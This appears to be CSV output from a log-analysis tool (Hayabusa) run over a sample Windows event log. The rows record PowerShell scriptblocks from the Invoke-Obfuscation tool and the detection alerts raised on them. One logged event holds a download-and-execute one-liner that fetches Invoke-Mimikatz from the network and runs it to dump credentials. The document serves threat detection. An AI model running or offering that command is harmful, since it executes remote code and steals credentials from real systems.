.LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. 
Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green } Function Out-ScriptContents { <# .SYNOPSIS HELPER FUNCTION :: Displays current obfuscated command for Invoke-Obfuscation. 
Invoke-Obfuscation Function: Out-ScriptContents Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ScriptContents displays current obfuscated command for Invoke-Obfuscation. .PARAMETER ScriptContents Specifies the string containing your payload. .PARAMETER PrintWarning Switch to output redacted form of ScriptContents if they exceed 8,190 characters. .EXAMPLE C:\PS> Out-ScriptContents .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [String] $ScriptContents, [Switch] $PrintWarning ) If($ScriptContents.Length -gt $CmdMaxLength) { # Output ScriptContents, handling if the size of ScriptContents exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ""[*] ObfuscatedCommand: "".Length $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $ScriptContents.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Magenta Write-",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Host $RedactionMessage -NoNewLine 
-ForegroundColor Yellow Write-Host $ScriptContents.SubString($ScriptContents.Length-$RedactedPrintLength) -ForegroundColor Magenta } Else { Write-Host $ScriptContents -ForegroundColor Magenta } # Make sure final command doesn't exceed cmd.exe's character limit. If($ScriptContents.Length -gt $CmdMaxLength) { If($PSBoundParameters['PrintWarning']) { Write-Host ""`nWARNING: This command exceeds the cmd.exe maximum length of $CmdMaxLength."" -ForegroundColor Red Write-Host "" Its length is"" -NoNewLine -ForegroundColor Red Write-Host "" $($ScriptContents.Length)"" -NoNewLine -ForegroundColor Yellow Write-Host "" characters."" -ForegroundColor Red } } } Function Show-AsciiArt { <# .SYNOPSIS HELPER FUNCTION :: Displays random ASCII art for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-AsciiArt Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-AsciiArt displays random ASCII art for Invoke-Obfuscation, and also displays ASCII art during script startup. .EXAMPLE C:\PS> Show-AsciiArt .NOTES Credit for ASCII art font generation: http://patorjk.com/software/taag/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [Switch] $Random ) # Create multiple ASCII art title banners. 
$Spacing = ""`t"" $InvokeObfuscationAscii = @() $InvokeObfuscationAscii += $Spacing + ' ____ __ ' $InvokeObfuscationAscii += $Spacing + ' / _/___ _ ______ / /_____ ' $InvokeObfuscationAscii += $Spacing + ' / // __ \ | / / __ \/ //_/ _ \______ ' $InvokeObfuscationAscii += $Spacing + ' _/ // / / / |/ / /_/ / ,< / __/_____/ ' $InvokeObfuscationAscii += $Spacing + '/______ /__|_________/_/|_|\___/ __ _ ' $InvokeObfuscationAscii += $Spacing + ' / __ \/ /_ / __/_ ________________ _/ /_(_)___ ____ ' $InvokeObfuscationAscii += $Spacing + ' / / / / __ \/ /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \' $InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ / __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /' $InvokeObfuscationAscii += $Spacing + '\____/_.___/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ ' # Ascii art to run only during script startup. If(!$PSBoundParameters['Random']) { $ArrowAscii = @() $ArrowAscii += ' | ' $ArrowAscii += ' | ' $ArrowAscii += ' \ / ' $ArrowAscii += ' V ' # Show actual obfuscation example (generated with this tool) in reverse. 
Write-Host ""`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Char]) } ) -Join'' )"" -ForegroundColor Cyan Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""`$N7 =[char[ ] ] `""noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+ bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+'g0'+'tIRwb'+'g0(. 
'((`"";[Array]::Reverse(`$N7 ) ; IEX (`$N7-Join '' )"" -ForegroundColor Magenta Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host "".(`""wRIt`"" + `""e-H`"" + `""Ost`"") ( `""I`"" +`""nvoke`""+`""-Obfus`""+`""cat`"" + `""io`"" +`""n`"") -ForegroundColor ( 'Gre'+'en')"" -ForegroundColor Yellow Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""Write-Host `""Invoke-Obfuscation`"" -ForegroundColor Green"" -ForegroundColor White Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line} Start-Sleep -Milliseconds 100 # Write out below string in interactive format. Start-Sleep -Milliseconds 100 ForEach($Char in [Char[]]'Invoke-Obfuscation') { Start-Sleep -Milliseconds (Get-Random -Input @(25..200)) Write-Host $Char -NoNewline -ForegroundColor Green } Start-Sleep -Milliseconds 900 Write-Host """" Start-Sleep -Milliseconds 300 Write-Host # Display primary ASCII art title banner. $RandomColor = (Get-Random -Input @('Green','Cyan','Yellow')) ForEach($Line in $InvokeObfuscationAscii) { Write-Host $Line -ForegroundColor $RandomColor } } Else { # ASCII option in Invoke-Obfuscation interactive console. } # Output tool banner after all ASCII art. 
Write-Host """" Write-Host ""`tTool :: Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tAuthor :: Daniel Bohannon (DBO)"" -ForegroundColor Magenta Write-Host ""`tTwitter :: @danielhbohannon"" -ForegroundColor Magenta Write-Host ""`tBlog :: http://danielbohannon.com"" -ForegroundColor Magenta Write-Host ""`tGithub :: https://github.com/danielbohannon/Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tVersion :: 1.8"" -ForegroundColor Magenta Write-Host ""`tLicense :: Apache License, Version 2.0"" -ForegroundColor Magenta Write-Host ""`tNotes :: If(!`$Caffeinated) {Exit}"" -ForegroundColor Magenta }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Host $RedactionMessage -NoNewLine -ForegroundColor Yellow Write-Host $ScriptContents.SubString($ScriptContents.Length-$RedactedPrintLength) -ForegroundColor Magenta } Else { Write-Host $ScriptContents -ForegroundColor Magenta } # Make sure final command doesn't exceed cmd.exe's character limit. If($ScriptContents.Length -gt $CmdMaxLength) { If($PSBoundParameters['PrintWarning']) { Write-Host ""`nWARNING: This command exceeds the cmd.exe maximum length of $CmdMaxLength."" -ForegroundColor Red Write-Host "" Its length is"" -NoNewLine -ForegroundColor Red Write-Host "" $($ScriptContents.Length)"" -NoNewLine -ForegroundColor Yellow Write-Host "" characters."" -ForegroundColor Red } } } Function Show-AsciiArt { <# .SYNOPSIS HELPER FUNCTION :: Displays random ASCII art for Invoke-Obfuscation. 
Invoke-Obfuscation Function: Show-AsciiArt Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-AsciiArt displays random ASCII art for Invoke-Obfuscation, and also displays ASCII art during script startup. .EXAMPLE C:\PS> Show-AsciiArt .NOTES Credit for ASCII art font generation: http://patorjk.com/software/taag/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [Switch] $Random ) # Create multiple ASCII art title banners. $Spacing = ""`t"" $InvokeObfuscationAscii = @() $InvokeObfuscationAscii += $Spacing + ' ____ __ ' $InvokeObfuscationAscii += $Spacing + ' / _/___ _ ______ / /_____ ' $InvokeObfuscationAscii += $Spacing + ' / // __ \ | / / __ \/ //_/ _ \______ ' $InvokeObfuscationAscii += $Spacing + ' _/ // / / / |/ / /_/ / ,< / __/_____/ ' $InvokeObfuscationAscii += $Spacing + '/______ /__|_________/_/|_|\___/ __ _ ' $InvokeObfuscationAscii += $Spacing + ' / __ \/ /_ / __/_ ________________ _/ /_(_)___ ____ ' $InvokeObfuscationAscii += $Spacing + ' / / / / __ \/ /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \' $InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ / __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /' $InvokeObfuscationAscii += $Spacing + '\____/_.___/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ ' # Ascii art to run only during script startup. If(!$PSBoundParameters['Random']) { $ArrowAscii = @() $ArrowAscii += ' | ' $ArrowAscii += ' | ' $ArrowAscii += ' \ / ' $ArrowAscii += ' V ' # Show actual obfuscation example (generated with this tool) in reverse. 
Write-Host ""`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Char]) } ) -Join'' )"" -ForegroundColor Cyan Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""`$N7 =[char[ ] ] `""noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+ bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+'g0'+'tIRwb'+'g0(. 
'((`"";[Array]::Reverse(`$N7 ) ; IEX (`$N7-Join '' )"" -ForegroundColor Magenta Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host "".(`""wRIt`"" + `""e-H`"" + `""Ost`"") ( `""I`"" +`""nvoke`""+`""-Obfus`""+`""cat`"" + `""io`"" +`""n`"") -ForegroundColor ( 'Gre'+'en')"" -ForegroundColor Yellow Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""Write-Host `""Invoke-Obfuscation`"" -ForegroundColor Green"" -ForegroundColor White Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line} Start-Sleep -Milliseconds 100 # Write out below string in interactive format. Start-Sleep -Milliseconds 100 ForEach($Char in [Char[]]'Invoke-Obfuscation') { Start-Sleep -Milliseconds (Get-Random -Input @(25..200)) Write-Host $Char -NoNewline -ForegroundColor Green } Start-Sleep -Milliseconds 900 Write-Host """" Start-Sleep -Milliseconds 300 Write-Host # Display primary ASCII art title banner. $RandomColor = (Get-Random -Input @('Green','Cyan','Yellow')) ForEach($Line in $InvokeObfuscationAscii) { Write-Host $Line -ForegroundColor $RandomColor } } Else { # ASCII option in Invoke-Obfuscation interactive console. } # Output tool banner after all ASCII art. 
Write-Host """" Write-Host ""`tTool :: Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tAuthor :: Daniel Bohannon (DBO)"" -ForegroundColor Magenta Write-Host ""`tTwitter :: @danielhbohannon"" -ForegroundColor Magenta Write-Host ""`tBlog :: http://danielbohannon.com"" -ForegroundColor Magenta Write-Host ""`tGithub :: https://github.com/danielbohannon/Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tVersion :: 1.8"" -ForegroundColor Magenta Write-Host ""`tLicense :: Apache License, Version 2.0"" -ForegroundColor Magenta Write-Host ""`tNotes :: If(!`$Caffeinated) {Exit}"" -ForegroundColor Magenta }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.309 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:56.683 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,Invoke-Obfuscation,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:56.745 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$_.ModuleType -eq 'Manifest'},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:16:05.348 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. 
Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:16:32.699 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,{$_[1].Trim()},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:16:32.703 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:16:32.714 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$TempUserInput = $TempUserInput.Replace($_,'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:16:37.997 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. 
Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 